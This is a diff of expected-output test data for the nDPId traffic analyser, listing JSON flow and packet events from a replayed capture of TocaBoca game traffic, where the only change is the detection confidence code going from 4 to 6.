00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":1887,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1649339413371} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339413371,"flow_last_seen":1649339413371,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339413371,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1649339413371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1649339413371,"pkt":"eJS0JASgYDjgxTWgCABFAABUVGwAAD8RbcnAqAJkXCaaMdj4E78AQKGB\/\/8AAQAAAA8HHhQ0Av8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339413371,"flow_last_seen":1649339413371,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339413371,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339413371,"flow_last_seen":1649339413371,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339413371,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1649339413394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1649339413394,"pkt":"YDjgxTWgeJS0JASgCABFAABojmMAAHkR+b1cJpoxwKgCZBO\/2PgAVKPcAAAAAhCVwDsHHhQ0Af8AAAAAABQAAAAAAAAAAQAAAA8D\/wEAAAAALAAAAAApnASwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1649339413406,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1649339413406,"pkt":"eJS0JASgYDjgxTWgCABFAABxVHEAAD8RbafAqAJkXCaaMdj4E78AXZgEKZwAAgAAADIHHhQ0Af8AAAAAABQAAAAAAAAAABCVwDsGAAEEAAAANQAAAAHzAAEIHkEEBAAwNmZmN2RmMi0xYWYzLTRmNGMtOTFiOC1mMWE2YzVlZA=="} 
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339414587,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339414587,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649339424328,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1649339424328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1649339424328,"pkt":"YDjgxTWgeJS0JASgCABFAABojnsAAHkR+aVcJpoxwKgCZBO\/gGMAVCBGAAAAAhCV6uVoVFlOAf8AAAAAABQAAAAAAAAAAQAAABAD\/wEAAAAALAAAAAA0zASwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649339424328,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649339424328,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":32,"total-skipped-flows":0,"total-l4-payload-len":4155,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":4,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1649357329801} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1649357329801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1649357329801,"pkt":"eJS0JASgYDjgxTWgCABFAABxId0AAD8R6VDAqAJkW8dRe9bHE78AXZvqAZ0AAgAAADR76ExLAf8AAAAAABQAAAAAAAAAAIrS+jcGAAEEAAAANQAAAAHzAAEIHkEEAQA4MjYyMDUzMS04NzM3LTQ4MjQtOGZkMi1hNGQyOWUyNA=="} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1649357329801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1649357329801,"pkt":"YDjgxTWgeJS0JASgCABFAAApSEAAADsRxy5bx1GCwKgCZBO\/qDgAFdCFfX19fX19fX19fX19EgAAAAAA"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649339413371,"flow_last_seen":1649339414587,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":480,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649339413371,"flow_last_seen":1649339414587,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":480,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357385501,"flow_last_seen":1649357385501,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649357385501,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1649357385501,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1649357385501,"pkt":"eJS0JASgYDjgxTWgCABFAABULJIAAD8R3rjAqAJkW8dRe68SE78AQNh6\/\/8AAQAAC5AWFTW+Av8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357385501,"flow_last_seen":1649357385501,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649357385501,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357385501,"flow_last_seen":1649357385501,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649357385501,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1649357385537,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1649357385537,"pkt":"YDjgxTWgeJS0JASgCABFAABoscMAADsRXXNbx1F7wKgCZBO\/rxIAVC6GAAAAAorT0\/0WFTW+Af8AAAAAABQAAAAAAAAAAQAAC5AD\/wEAAAAALAAAAABH6wSwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1649357386016,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649357386016,"pkt":"eJS0JASgYDjgxTWgCABFAAA8LNEAAD8R3pHAqAJkW8dRe68SE78AKMpCR+sAAQAADZcWFTW+Af8AAAAAABQAAAAAAAAAAIrT0\/0="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1649357623776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1649357623776,"pkt":"YDjgxTWgeJS0JASgCABFAABLD1IAADsRAAJbx1F7wKgCZBO\/7aUAN6TVAAAAAorXdpgVzsWSAQAAAAAAABQAAAAAAAAAAQAAEP0GAAEAAAAADwAAAAHzAQA="} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649357385501,"flow_last_seen":1649357387791,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1714,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649357385501,"flow_last_seen":1649357387791,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1714,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649357796478,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 